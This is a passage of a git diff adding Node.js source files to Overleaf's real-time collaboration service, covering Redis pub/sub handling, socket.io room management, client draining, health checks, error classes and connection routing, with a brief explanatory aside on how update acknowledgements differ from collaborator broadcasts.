+ rclientList: RedisClientManager.createClientList(settings.redis.pubsub), + + listenForUpdatesFromDocumentUpdater(io) { + logger.debug( + { rclients: this.rclientList.length }, + 'listening for applied-ops events' + ) + for (const rclient of this.rclientList) { + rclient.subscribe('applied-ops') + rclient.on('message', function (channel, message) { + metrics.inc('rclient', 0.001) // global event rate metric + if (settings.debugEvents > 0) { + EventLogger.debugEvent(channel, message) + } + DocumentUpdaterController._processMessageFromDocumentUpdater( + io, + channel, + message + ) + }) + } + // create metrics for each redis instance only when we have multiple redis clients + if (this.rclientList.length > 1) { + this.rclientList.forEach((rclient, i) => { + // per client event rate metric + const metricName = `rclient-${i}` + rclient.on('message', () => metrics.inc(metricName, 0.001)) + }) + } + this.handleRoomUpdates(this.rclientList) + }, + + handleRoomUpdates(rclientSubList) { + const roomEvents = RoomManager.eventSource() + roomEvents.on('doc-active', function (docId) { + const subscribePromises = rclientSubList.map(rclient => + ChannelManager.subscribe(rclient, 'applied-ops', docId) + ) + RoomManager.emitOnCompletion(subscribePromises, `doc-subscribed-${docId}`) + }) + roomEvents.on('doc-empty', docId => + rclientSubList.map(rclient => + ChannelManager.unsubscribe(rclient, 'applied-ops', docId) + ) + ) + }, + + _processMessageFromDocumentUpdater(io, channel, message) { + SafeJsonParse.parse(message, function (error, message) { + if (error) { + logger.error({ err: error, channel }, 'error parsing JSON') + return + } + if (message.op) { + if (message._id && settings.checkEventOrder) { + const status = EventLogger.checkEventOrder( + 'applied-ops', + message._id, + message + ) + if (status === 'duplicate') { + return // skip duplicate events + } + } + DocumentUpdaterController._applyUpdateFromDocumentUpdater( + io, + message.doc_id, + message.op + ) + } else if (message.error) { + DocumentUpdaterController._processErrorFromDocumentUpdater( + io, + message.doc_id, + message.error, + message + ) + } else if (message.health_check) { + logger.debug( + { message }, + 'got health check message in applied ops channel' + ) + HealthCheckManager.check(channel, message.key) + } + }) + }, + + _applyUpdateFromDocumentUpdater(io, docId, update) { + let client + const clientList = io.sockets.clients(docId) + // avoid unnecessary work if no clients are connected + if (clientList.length === 0) { + return + } + + update.meta = update.meta || {} + const { tsRT: realTimeIngestionTime } = update.meta + delete update.meta.tsRT + + // send updates to clients + logger.debug( + { + docId, + version: update.v, + source: update.meta && update.meta.source, + socketIoClients: clientList.map(client => client.id), + }, + 'distributing updates to clients' + ) + const seen = {} + // send messages only to unique clients (due to duplicate entries in io.sockets.clients) + for (client of clientList) { + if (!seen[client.id]) { + seen[client.id] = true + if (client.publicId === update.meta.source) { + logger.debug( + { + docId, + version: update.v, + source: update.meta.source, + }, + 'distributing update to sender' + ) + metrics.histogram( + 'update-processing-time', + performance.now() - realTimeIngestionTime, + [ + 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 50, 100, 200, 500, 1000, + 2000, 5000, 10000, + ], + { path: 'sharejs' } + ) + client.emit('otUpdateApplied', { v: update.v, doc: update.doc }) + } else if (!update.dup) { + 
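
Note the asymmetry this loop creates on the wire: the sending client receives a bare acknowledgement (`{ v, doc }`), other collaborators receive the full op, and duplicate ops go back to the sender only. A hypothetical client-side listener that tells the two payloads apart (a connected socket.io client named `socket` is assumed):

    // `socket` is assumed to be an already-connected socket.io client.
    socket.on('otUpdateApplied', update => {
      if (update.op === undefined) {
        // Acknowledgement of our own op: only { v, doc } comes back.
        console.log(`own op confirmed at version ${update.v}`)
      } else {
        // A collaborator's op, to be applied to the local document.
        console.log(`remote op for doc ${update.doc} at version ${update.v}`)
      }
    })
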
// Duplicate ops should just be sent back to sending client for acknowledgement
+          logger.debug(
+            {
+              docId,
+              version: update.v,
+              source: update.meta.source,
+              clientId: client.id,
+            },
+            'distributing update to collaborator'
+          )
+          client.emit('otUpdateApplied', update)
+        }
+      }
+    }
+    if (Object.keys(seen).length < clientList.length) {
+      metrics.inc('socket-io.duplicate-clients', 0.1)
+      logger.debug(
+        {
+          docId,
+          socketIoClients: clientList.map(client => client.id),
+        },
+        'discarded duplicate clients'
+      )
+    }
+  },
+
+  _processErrorFromDocumentUpdater(io, docId, error, message) {
+    for (const client of io.sockets.clients(docId)) {
+      logger.warn(
+        { err: error, docId, clientId: client.id },
+        'error from document updater, disconnecting client'
+      )
+      client.emit('otUpdateError', error, message)
+      client.disconnect()
+    }
+  },
+}
diff --git a/services/real-time/app/js/DocumentUpdaterManager.js b/services/real-time/app/js/DocumentUpdaterManager.js
new file mode 100644
index 0000000..0a9a12c
--- /dev/null
+++ b/services/real-time/app/js/DocumentUpdaterManager.js
@@ -0,0 +1,156 @@
+const request = require('request')
+const _ = require('lodash')
+const OError = require('@overleaf/o-error')
+const logger = require('@overleaf/logger')
+const settings = require('@overleaf/settings')
+const metrics = require('@overleaf/metrics')
+const {
+  ClientRequestedMissingOpsError,
+  DocumentUpdaterRequestFailedError,
+  NullBytesInOpError,
+  UpdateTooLargeError,
+} = require('./Errors')
+
+const rclient = require('@overleaf/redis-wrapper').createClient(
+  settings.redis.documentupdater
+)
+const Keys = settings.redis.documentupdater.key_schema
+
+const DocumentUpdaterManager = {
+  getDocument(projectId, docId, fromVersion, callback) {
+    const timer = new metrics.Timer('get-document')
+    const url = `${settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}`
+    logger.debug(
+      { projectId, docId, fromVersion },
+      'getting doc from document updater'
+    )
+    request.get(url, function (err, res, body) {
+      timer.done()
+      if (err) {
+        OError.tag(err, 'error getting doc from doc updater')
+        return callback(err)
+      }
+      if (res.statusCode >= 200 && res.statusCode < 300) {
+        logger.debug(
+          { projectId, docId },
+          'got doc from document updater'
+        )
+        try {
+          body = JSON.parse(body)
+        } catch (error) {
+          OError.tag(error, 'error parsing doc updater response')
+          return callback(error)
+        }
+        body = body || {}
+        callback(
+          null,
+          body.lines,
+          body.version,
+          body.ranges,
+          body.ops,
+          body.ttlInS
+        )
+      } else if (res.statusCode === 422 && body?.firstVersionInRedis) {
+        callback(new ClientRequestedMissingOpsError(422, body))
+      } else if ([404, 422].includes(res.statusCode)) {
+        callback(new ClientRequestedMissingOpsError(res.statusCode))
+      } else {
+        callback(
+          new DocumentUpdaterRequestFailedError('getDocument', res.statusCode)
+        )
+      }
+    })
+  },
+
+  checkDocument(projectId, docId, callback) {
+    // in this call fromVersion = -1 means get document without docOps
+    DocumentUpdaterManager.getDocument(projectId, docId, -1, callback)
+  },
+
+  flushProjectToMongoAndDelete(projectId, callback) {
+    // this method is called when the last connected user leaves the project
+    logger.debug({ projectId }, 'deleting project from document updater')
+    const timer = new metrics.Timer('delete.mongo.project')
+    // flush the project in the background when all users have left
+    const url =
+      `${settings.apis.documentupdater.url}/project/${projectId}?background=true` +
(settings.shutDownInProgress ? '&shutdown=true' : '') + request.del(url, function (err, res) { + timer.done() + if (err) { + OError.tag(err, 'error deleting project from document updater') + callback(err) + } else if (res.statusCode >= 200 && res.statusCode < 300) { + logger.debug({ projectId }, 'deleted project from document updater') + callback(null) + } else { + callback( + new DocumentUpdaterRequestFailedError( + 'flushProjectToMongoAndDelete', + res.statusCode + ) + ) + } + }) + }, + + _getPendingUpdateListKey() { + const shard = _.random(0, settings.pendingUpdateListShardCount - 1) + if (shard === 0) { + return 'pending-updates-list' + } else { + return `pending-updates-list-${shard}` + } + }, + + queueChange(projectId, docId, change, callback) { + const allowedKeys = [ + 'doc', + 'op', + 'v', + 'dupIfSource', + 'meta', + 'lastV', + 'hash', + ] + change = _.pick(change, allowedKeys) + const jsonChange = JSON.stringify(change) + if (jsonChange.indexOf('\u0000') !== -1) { + // memory corruption check + return callback(new NullBytesInOpError(jsonChange)) + } + + const updateSize = jsonChange.length + if (updateSize > settings.maxUpdateSize) { + return callback(new UpdateTooLargeError(updateSize)) + } + + // record metric for each update added to queue + metrics.summary('redis.pendingUpdates', updateSize, { status: 'push' }) + + const docKey = `${projectId}:${docId}` + // Push onto pendingUpdates for doc_id first, because once the doc updater + // gets an entry on pending-updates-list, it starts processing. + rclient.rpush( + Keys.pendingUpdates({ doc_id: docId }), + jsonChange, + function (error) { + if (error) { + error = new OError('error pushing update into redis').withCause(error) + return callback(error) + } + const queueKey = DocumentUpdaterManager._getPendingUpdateListKey() + rclient.rpush(queueKey, docKey, function (error) { + if (error) { + error = new OError('error pushing doc_id into redis') + .withInfo({ queueKey }) + .withCause(error) + } + callback(error) + }) + } + ) + }, +} + +module.exports = DocumentUpdaterManager diff --git a/services/real-time/app/js/DrainManager.js b/services/real-time/app/js/DrainManager.js new file mode 100644 index 0000000..c8fc72c --- /dev/null +++ b/services/real-time/app/js/DrainManager.js @@ -0,0 +1,59 @@ +const logger = require('@overleaf/logger') + +module.exports = { + startDrainTimeWindow(io, minsToDrain, callback) { + const drainPerMin = io.sockets.clients().length / minsToDrain + // enforce minimum drain rate + this.startDrain(io, Math.max(drainPerMin / 60, 4), callback) + }, + + startDrain(io, rate, callback) { + // Clear out any old interval + clearInterval(this.interval) + logger.info({ rate }, 'starting drain') + if (rate === 0) { + return + } + let pollingInterval + if (rate < 1) { + // allow lower drain rates + // e.g. 
rate=0.1 will drain one client every 10 seconds + pollingInterval = 1000 / rate + rate = 1 + } else { + pollingInterval = 1000 + } + this.interval = setInterval(() => { + const requestedAllClientsToReconnect = this.reconnectNClients(io, rate) + if (requestedAllClientsToReconnect && callback) { + callback() + callback = undefined + } + }, pollingInterval) + }, + + RECONNECTED_CLIENTS: {}, + reconnectNClients(io, N) { + let drainedCount = 0 + for (const client of io.sockets.clients()) { + if (!this.RECONNECTED_CLIENTS[client.id]) { + this.RECONNECTED_CLIENTS[client.id] = true + logger.debug( + { clientId: client.id }, + 'Asking client to reconnect gracefully' + ) + client.emit('reconnectGracefully') + drainedCount++ + } + const haveDrainedNClients = drainedCount === N + if (haveDrainedNClients) { + break + } + } + if (drainedCount < N) { + logger.info('All clients have been told to reconnectGracefully') + return true + } + return false + }, +} diff --git a/services/real-time/app/js/Errors.js b/services/real-time/app/js/Errors.js new file mode 100644 index 0000000..fea0cc6 --- /dev/null +++ b/services/real-time/app/js/Errors.js @@ -0,0 +1,104 @@ +const OError = require('@overleaf/o-error') + +class ClientRequestedMissingOpsError extends OError { + constructor(statusCode, info = {}) { + super('doc updater could not load requested ops', { + statusCode, + ...info, + }) + } +} + +class CodedError extends OError { + constructor(message, code) { + super(message, { code }) + } +} + +class CorruptedJoinProjectResponseError extends OError { + constructor() { + super('no data returned from joinProject request') + } +} + +class DataTooLargeToParseError extends OError { + constructor(data) { + super('data too large to parse', { + head: data.slice(0, 1024), + length: data.length, + }) + } +} + +class DocumentUpdaterRequestFailedError extends OError { + constructor(action, statusCode) { + super('doc updater returned a non-success status code', { + action, + statusCode, + }) + } +} + +class JoinLeaveEpochMismatchError extends OError { + constructor() { + super('joinLeaveEpoch mismatch') + } +} + +class MissingSessionError extends OError { + constructor() { + super('could not look up session by key') + } +} + +class NotAuthorizedError extends OError { + constructor() { + super('not authorized') + } +} + +class NotJoinedError extends OError { + constructor() { + super('no project_id found on client') + } +} + +class NullBytesInOpError extends OError { + constructor(jsonChange) { + super('null bytes found in op', { jsonChange }) + } +} + +class UnexpectedArgumentsError extends OError { + constructor() { + super('unexpected arguments') + } +} + +class UpdateTooLargeError extends OError { + constructor(updateSize) { + super('update is too large', { updateSize }) + } +} + +class WebApiRequestFailedError extends OError { + constructor(statusCode) { + super('non-success status code from web', { statusCode }) + } +} + +module.exports = { + CodedError, + CorruptedJoinProjectResponseError, + ClientRequestedMissingOpsError, + DataTooLargeToParseError, + DocumentUpdaterRequestFailedError, + JoinLeaveEpochMismatchError, + MissingSessionError, + NotAuthorizedError, + NotJoinedError, + NullBytesInOpError, + UnexpectedArgumentsError, + UpdateTooLargeError, + WebApiRequestFailedError, +} diff --git a/services/real-time/app/js/EventLogger.js b/services/real-time/app/js/EventLogger.js new file mode 100644 index 0000000..44496eb --- /dev/null +++ b/services/real-time/app/js/EventLogger.js @@ -0,0 +1,81 @@ +let EventLogger 
+const logger = require('@overleaf/logger')
+const metrics = require('@overleaf/metrics')
+const settings = require('@overleaf/settings')
+
+// keep track of message counters to detect duplicate and out-of-order events
+// message ids have the format "UNIQUEHOSTKEY-COUNTER"
+
+const EVENT_LOG_COUNTER = {}
+const EVENT_LOG_TIMESTAMP = {}
+let EVENT_LAST_CLEAN_TIMESTAMP = 0
+
+// counter for debug logs
+let COUNTER = 0
+
+module.exports = EventLogger = {
+  MAX_STALE_TIME_IN_MS: 3600 * 1000,
+
+  debugEvent(channel, message) {
+    if (settings.debugEvents > 0) {
+      logger.info({ channel, message, counter: COUNTER++ }, 'logging event')
+      settings.debugEvents--
+    }
+  },
+
+  checkEventOrder(channel, messageId) {
+    if (typeof messageId !== 'string') {
+      return
+    }
+    let result
+    if (!(result = messageId.match(/^(.*)-(\d+)$/))) {
+      return
+    }
+    const key = result[1]
+    const count = parseInt(result[2], 10)
+    if (!(count >= 0)) {
+      // ignore checks if counter is not present
+      return
+    }
+    // store the last count in a hash for each host
+    const previous = EventLogger._storeEventCount(key, count)
+    if (!previous || count === previous + 1) {
+      metrics.inc(`event.${channel}.valid`)
+      return // order is ok
+    }
+    if (count === previous) {
+      metrics.inc(`event.${channel}.duplicate`)
+      logger.warn({ channel, messageId }, 'duplicate event')
+      return 'duplicate'
+    } else {
+      metrics.inc(`event.${channel}.out-of-order`)
+      logger.warn(
+        { channel, messageId, key, previous, count },
+        'out of order event'
+      )
+      return 'out-of-order'
+    }
+  },

+  _storeEventCount(key, count) {
+    const previous = EVENT_LOG_COUNTER[key]
+    const now = Date.now()
+    EVENT_LOG_COUNTER[key] = count
+    EVENT_LOG_TIMESTAMP[key] = now
+    // periodically remove old counts
+    if (now - EVENT_LAST_CLEAN_TIMESTAMP > EventLogger.MAX_STALE_TIME_IN_MS) {
+      EventLogger._cleanEventStream(now)
+      EVENT_LAST_CLEAN_TIMESTAMP = now
+    }
+    return previous
+  },
+
+  _cleanEventStream(now) {
+    Object.entries(EVENT_LOG_TIMESTAMP).forEach(([key, timestamp]) => {
+      if (now - timestamp > EventLogger.MAX_STALE_TIME_IN_MS) {
+        delete EVENT_LOG_COUNTER[key]
+        delete EVENT_LOG_TIMESTAMP[key]
+      }
+    })
+  },
+}
diff --git a/services/real-time/app/js/HealthCheckManager.js b/services/real-time/app/js/HealthCheckManager.js
new file mode 100644
index 0000000..4ced9e0
--- /dev/null
+++ b/services/real-time/app/js/HealthCheckManager.js
@@ -0,0 +1,77 @@
+const metrics = require('@overleaf/metrics')
+const logger = require('@overleaf/logger')
+
+const os = require('node:os')
+const HOST = os.hostname()
+const PID = process.pid
+let COUNT = 0
+
+const CHANNEL_MANAGER = {} // hash of event checkers by channel name
+const CHANNEL_ERROR = {} // error status by channel name
+
+module.exports = class HealthCheckManager {
+  // create an instance of this class which checks that an event with a unique
+  // id is received only once within a timeout
+  constructor(channel, timeout) {
+    // unique event string
+    this.channel = channel
+    this.id = `host=${HOST}:pid=${PID}:count=${COUNT++}`
+    // count of number of times the event is received
+    this.count = 0
+    // after a timeout check the status of the count
+    this.handler = setTimeout(() => {
+      this.setStatus()
+    }, timeout || 1000)
+    // use a timer to record the latency of the channel
+    this.timer = new metrics.Timer(`event.${this.channel}.latency`)
+    // keep a record of these objects to dispatch on
+    CHANNEL_MANAGER[this.channel] = this
+  }
+
+  processEvent(id) {
+    // if this is our event record it
+    if (id === this.id) {
+      this.count++
+      if (this.timer) {
+        this.timer.done()
+      }
+      this.timer = undefined // only time the latency of the first event
+    }
+  }
+
+  setStatus() {
+    // if we saw the event any number of times other than once, that is an error
+    const isFailing = this.count !== 1
+    if (isFailing) {
+      logger.err(
+        { channel: this.channel, count: this.count, id: this.id },
+        'redis channel health check error'
+      )
+    }
+    CHANNEL_ERROR[this.channel] = isFailing
+  }
+
+  // class methods
+  static check(channel, id) {
+    // dispatch event to manager for channel
+    if (CHANNEL_MANAGER[channel]) {
+      CHANNEL_MANAGER[channel].processEvent(id)
+    }
+  }
+
+  static status() {
+    // return status of all channels for logging
+    return CHANNEL_ERROR
+  }
+
+  static isFailing() {
+    // check if any channel status is bad
+    for (const channel in CHANNEL_ERROR) {
+      const error = CHANNEL_ERROR[channel]
+      if (error === true) {
+        return true
+      }
+    }
+    return false
+  }
+}
diff --git a/services/real-time/app/js/HttpApiController.js b/services/real-time/app/js/HttpApiController.js
new file mode 100644
index 0000000..122f183
--- /dev/null
+++ b/services/real-time/app/js/HttpApiController.js
@@ -0,0 +1,49 @@
+const WebsocketLoadBalancer = require('./WebsocketLoadBalancer')
+const DrainManager = require('./DrainManager')
+const logger = require('@overleaf/logger')
+
+module.exports = {
+  sendMessage(req, res) {
+    logger.debug({ message: req.params.message }, 'sending message')
+    if (Array.isArray(req.body)) {
+      for (const payload of req.body) {
+        WebsocketLoadBalancer.emitToRoom(
+          req.params.project_id,
+          req.params.message,
+          payload
+        )
+      }
+    } else {
+      WebsocketLoadBalancer.emitToRoom(
+        req.params.project_id,
+        req.params.message,
+        req.body
+      )
+    }
+    res.sendStatus(204)
+  },
+
+  startDrain(req, res) {
+    const io = req.app.get('io')
+    let rate = req.query.rate || '4'
+    rate = parseFloat(rate) || 0
+    logger.info({ rate }, 'setting client drain rate')
+    DrainManager.startDrain(io, rate)
+    res.sendStatus(204)
+  },
+
+  disconnectClient(req, res, next) {
+    const io = req.app.get('io')
+    const { client_id: clientId } = req.params
+    const client = io.sockets.sockets[clientId]
+
+    if (!client) {
+      logger.debug({ clientId }, 'api: client already disconnected')
+      res.sendStatus(404)
+      return
+    }
+    logger.info({ clientId }, 'api: requesting client disconnect')
+    client.on('disconnect', () => res.sendStatus(204))
+    client.disconnect()
+  },
+}
diff --git a/services/real-time/app/js/HttpController.js b/services/real-time/app/js/HttpController.js
new file mode 100644
index 0000000..79978ed
--- /dev/null
+++ b/services/real-time/app/js/HttpController.js
@@ -0,0 +1,53 @@
+let HttpController
+module.exports = HttpController = {
+  // The code in this controller is hard to unit test because of its many
+  // dependencies on internal socket.io methods. It is not critical to the
+  // running of Overleaf, and is only used for getting stats about connected
+  // clients and for checking internal state in acceptance tests. The
+  // acceptance tests should provide appropriate coverage.
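+  //
+  // For illustration, a hypothetical entry returned by getConnectedClients
+  // (the exact values depend on the connected client):
+  //   {
+  //     client_id: 'xyz', project_id: '...', user_id: '...',
+  //     first_name: 'Ada', last_name: 'Lovelace', email: 'ada@example.com',
+  //     connected_time: '2025-04-24T05:11:28.000Z',
+  //     rooms: ['<project_id>', '<doc_id>']
+  //   }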
+ _getConnectedClientView(ioClient) { + const clientId = ioClient.id + const { + project_id: projectId, + user_id: userId, + first_name: firstName, + last_name: lastName, + email, + connected_time: connectedTime, + } = ioClient.ol_context + const client = { + client_id: clientId, + project_id: projectId, + user_id: userId, + first_name: firstName, + last_name: lastName, + email, + connected_time: connectedTime, + } + client.rooms = Object.keys(ioClient.manager.roomClients[clientId] || {}) + // drop the namespace + .filter(room => room !== '') + // room names are composed as '<NAMESPACE>/<ROOM>' and the default + // namespace is empty (see comments in RoomManager), just drop the '/' + .map(fullRoomPath => fullRoomPath.slice(1)) + return client + }, + + getConnectedClients(req, res) { + const io = req.app.get('io') + const ioClients = io.sockets.clients() + + res.json(ioClients.map(HttpController._getConnectedClientView)) + }, + + getConnectedClient(req, res) { + const { client_id: clientId } = req.params + const io = req.app.get('io') + const ioClient = io.sockets.sockets[clientId] + if (!ioClient) { + res.sendStatus(404) + return + } + res.json(HttpController._getConnectedClientView(ioClient)) + }, +} diff --git a/services/real-time/app/js/RedisClientManager.js b/services/real-time/app/js/RedisClientManager.js new file mode 100644 index 0000000..63eccef --- /dev/null +++ b/services/real-time/app/js/RedisClientManager.js @@ -0,0 +1,19 @@ +const redis = require('@overleaf/redis-wrapper') +const logger = require('@overleaf/logger') + +module.exports = { + createClientList(...configs) { + // create a dynamic list of redis clients, excluding any configurations which are not defined + return configs.filter(Boolean).map(x => { + const redisType = x.cluster + ? 'cluster' + : x.sentinels + ? 'sentinel' + : x.host + ? 'single' + : 'unknown' + logger.debug({ redis: redisType }, 'creating redis client') + return redis.createClient(x) + }) + }, +} diff --git a/services/real-time/app/js/RoomManager.js b/services/real-time/app/js/RoomManager.js new file mode 100644 index 0000000..47302d5 --- /dev/null +++ b/services/real-time/app/js/RoomManager.js @@ -0,0 +1,161 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { EventEmitter } = require('node:events') +const OError = require('@overleaf/o-error') + +const IdMap = new Map() // keep track of whether ids are from projects or docs +const RoomEvents = new EventEmitter() // emits {project,doc}-active and {project,doc}-empty events + +// Manage socket.io rooms for individual projects and docs +// +// The first time someone joins a project or doc we emit a 'project-active' or +// 'doc-active' event. +// +// When the last person leaves a project or doc, we emit 'project-empty' or +// 'doc-empty' event. +// +// The pubsub side is handled by ChannelManager + +module.exports = { + joinProject(client, projectId, callback) { + this.joinEntity(client, 'project', projectId, callback) + }, + + joinDoc(client, docId, callback) { + this.joinEntity(client, 'doc', docId, callback) + }, + + leaveDoc(client, docId) { + this.leaveEntity(client, 'doc', docId) + }, + + leaveProjectAndDocs(client) { + // what rooms is this client in? we need to leave them all. socket.io + // will cause us to leave the rooms, so we only need to manage our + // channel subscriptions... 
but it will be safer if we leave them + // explicitly, and then socket.io will just regard this as a client that + // has not joined any rooms and do a final disconnection. + const roomsToLeave = this._roomsClientIsIn(client) + logger.debug({ client: client.id, roomsToLeave }, 'client leaving project') + for (const id of roomsToLeave) { + const entity = IdMap.get(id) + this.leaveEntity(client, entity, id) + } + }, + + emitOnCompletion(promiseList, eventName) { + Promise.all(promiseList) + .then(() => RoomEvents.emit(eventName)) + .catch(err => RoomEvents.emit(eventName, err)) + }, + + eventSource() { + return RoomEvents + }, + + joinEntity(client, entity, id, callback) { + const beforeCount = this._clientsInRoom(client, id) + // client joins room immediately but joinDoc request does not complete + // until room is subscribed + client.join(id) + // is this a new room? if so, subscribe + if (beforeCount === 0) { + logger.debug({ entity, id }, 'room is now active') + RoomEvents.once(`${entity}-subscribed-${id}`, function (err) { + // only allow the client to join when all the relevant channels have subscribed + if (err) { + OError.tag(err, 'error joining', { entity, id }) + return callback(err) + } + logger.debug( + { client: client.id, entity, id, beforeCount }, + 'client joined new room and subscribed to channel' + ) + callback(err) + }) + RoomEvents.emit(`${entity}-active`, id) + IdMap.set(id, entity) + // keep track of the number of listeners + metrics.gauge('room-listeners', RoomEvents.eventNames().length) + } else { + logger.debug( + { client: client.id, entity, id, beforeCount }, + 'client joined existing room' + ) + callback() + } + }, + + leaveEntity(client, entity, id) { + // Ignore any requests to leave when the client is not actually in the + // room. This can happen if the client sends spurious leaveDoc requests + // for old docs after a reconnection. + // This can now happen all the time, as we skip the join for clients that + // disconnect before joinProject/joinDoc completed. + if (!this._clientAlreadyInRoom(client, id)) { + logger.debug( + { client: client.id, entity, id }, + 'ignoring request from client to leave room it is not in' + ) + return + } + client.leave(id) + const afterCount = this._clientsInRoom(client, id) + logger.debug( + { client: client.id, entity, id, afterCount }, + 'client left room' + ) + // is the room now empty? 
if so, unsubscribe + if (!entity) { + logger.error({ entity: id }, 'unknown entity when leaving with id') + return + } + if (afterCount === 0) { + logger.debug({ entity, id }, 'room is now empty') + RoomEvents.emit(`${entity}-empty`, id) + IdMap.delete(id) + metrics.gauge('room-listeners', RoomEvents.eventNames().length) + } + }, + + // internal functions below, these access socket.io rooms data directly and + // will need updating for socket.io v2 + + // The below code makes some assumptions that are always true for v0 + // - we are using the base namespace '', so room names are '/<ENTITY>' + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L62 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L1018 + // - client.namespace is a Namespace + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/namespace.js#L204 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/socket.js#L40 + // - client.manager is a Manager + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/namespace.js#L204 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/socket.js#L41 + // - a Manager has + // - `.rooms={'NAMESPACE/ENTITY': []}` and + // - `.roomClients={'CLIENT_ID': {'...': true}}` + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L287-L288 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L444-L455 + + _clientsInRoom(client, room) { + const clients = client.manager.rooms['/' + room] || [] + return clients.length + }, + + _roomsClientIsIn(client) { + const rooms = client.manager.roomClients[client.id] || {} + return ( + Object.keys(rooms) + // drop the namespace + .filter(room => room !== '') + // room names are composed as '<NAMESPACE>/<ROOM>' and the default + // namespace is empty (see comments above), just drop the '/' + .map(fullRoomPath => fullRoomPath.slice(1)) + ) + }, + + _clientAlreadyInRoom(client, room) { + const rooms = client.manager.roomClients[client.id] || {} + return !!rooms['/' + room] + }, +} diff --git a/services/real-time/app/js/Router.js b/services/real-time/app/js/Router.js new file mode 100644 index 0000000..238dc38 --- /dev/null +++ b/services/real-time/app/js/Router.js @@ -0,0 +1,607 @@ +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const WebsocketController = require('./WebsocketController') +const HttpController = require('./HttpController') +const HttpApiController = require('./HttpApiController') +const WebsocketAddressManager = require('./WebsocketAddressManager') +const bodyParser = require('body-parser') +const base64id = require('base64id') +const { UnexpectedArgumentsError } = require('./Errors') +const Joi = require('joi') + +const HOSTNAME = require('node:os').hostname() +const SERVER_PING_INTERVAL = 15000 +const SERVER_PING_LATENCY_THRESHOLD = 5000 + +const JOI_OBJECT_ID = Joi.string() + .required() + .regex(/^[0-9a-f]{24}$/) + .message('invalid id') + +let Router +module.exports = Router = { + _handleError(callback, error, client, method, attrs) { + attrs = attrs || {} + for (const key of ['project_id', 'user_id']) { + attrs[key] = attrs[key] || client.ol_context[key] + } + attrs.client_id = client.id + attrs.err = 
error + attrs.method = method + if (Joi.isError(error)) { + logger.info(attrs, 'validation error') + let message = 'invalid' + try { + message = error.details[0].message + } catch (e) { + // ignore unexpected errors + logger.warn({ error, e }, 'unexpected validation error') + } + const serializedError = { message } + metrics.inc('validation-error', 1, { + status: method, + }) + callback(serializedError) + } else if (error.name === 'CodedError') { + logger.warn(attrs, error.message) + const serializedError = { message: error.message, code: error.info.code } + callback(serializedError) + } else if (error.message === 'unexpected arguments') { + // the payload might be very large; put it on level debug + logger.debug(attrs, 'unexpected arguments') + metrics.inc('unexpected-arguments', 1, { status: method }) + const serializedError = { message: error.message } + callback(serializedError) + } else if (error.message === 'no project_id found on client') { + logger.debug(attrs, error.message) + const serializedError = { message: error.message } + callback(serializedError) + } else if ( + [ + 'not authorized', + 'joinLeaveEpoch mismatch', + 'doc updater could not load requested ops', + 'no project_id found on client', + 'cannot join multiple projects', + ].includes(error.message) + ) { + logger.warn(attrs, error.message) + const serializedError = { message: error.message } + callback(serializedError) + } else { + logger.error(attrs, `server side error in ${method}`) + // Don't return raw error to prevent leaking server side info + const serializedError = { + message: 'Something went wrong in real-time service', + } + callback(serializedError) + } + if (attrs.disconnect) { + setTimeout(function () { + client.disconnect() + }, 100) + } + }, + + _handleInvalidArguments(client, method, args) { + const error = new UnexpectedArgumentsError() + let callback = args[args.length - 1] + if (typeof callback !== 'function') { + callback = function () {} + } + const attrs = { arguments: args } + Router._handleError(callback, error, client, method, attrs) + }, + + configure(app, io, session) { + app.set('io', io) + + if (settings.behindProxy) { + app.set('trust proxy', settings.trustedProxyIps) + } + const websocketAddressManager = new WebsocketAddressManager( + settings.behindProxy, + settings.trustedProxyIps + ) + + app.get('/clients', HttpController.getConnectedClients) + app.get('/clients/:client_id', HttpController.getConnectedClient) + + app.post( + '/project/:project_id/message/:message', + bodyParser.json({ limit: '5mb' }), + HttpApiController.sendMessage + ) + + app.post('/drain', HttpApiController.startDrain) + app.post( + '/client/:client_id/disconnect', + HttpApiController.disconnectClient + ) + + session.on('connection', function (error, client, session) { + // init client context, we may access it in Router._handleError before + // setting any values + client.ol_context = {} + // bail out from joinDoc when a parallel joinDoc or leaveDoc is running + client.joinLeaveEpoch = 0 + + if (client) { + client.on('error', function (err) { + logger.err( + { clientErr: err, publicId: client.publicId, clientId: client.id }, + 'socket.io client error' + ) + if (client.connected) { + client.emit('reconnectGracefully') + client.disconnect() + } + }) + } + + if (settings.shutDownInProgress) { + client.emit('connectionRejected', { message: 'retry' }) + client.disconnect() + return + } + + if ( + client && + error && + error.message.match(/could not look up session by key/) + ) { + logger.warn( + { err: error, client: 
!!client, session: !!session }, + 'invalid session' + ) + // tell the client to reauthenticate if it has an invalid session key + client.emit('connectionRejected', { message: 'invalid session' }) + client.disconnect() + return + } + + if (error) { + logger.err( + { err: error, client: !!client, session: !!session }, + 'error when client connected' + ) + if (client) { + client.emit('connectionRejected', { message: 'error' }) + } + if (client) { + client.disconnect() + } + return + } + const useServerPing = + !!client.handshake?.query?.esh && + !!client.handshake?.query?.ssp && + // No server ping with long-polling transports. + client.transport === 'websocket' + const isDebugging = !!client.handshake?.query?.debugging + const projectId = client.handshake?.query?.projectId + + if (isDebugging) { + client.connectedAt = Date.now() + client.isDebugging = true + } + + if (!isDebugging) { + try { + Joi.assert(projectId, JOI_OBJECT_ID) + } catch (error) { + metrics.inc('socket-io.connection', 1, { + status: client.transport, + method: projectId ? 'bad-project-id' : 'missing-project-id', + }) + client.emit('connectionRejected', { + message: 'missing/bad ?projectId=... query flag on handshake', + }) + client.disconnect() + return + } + 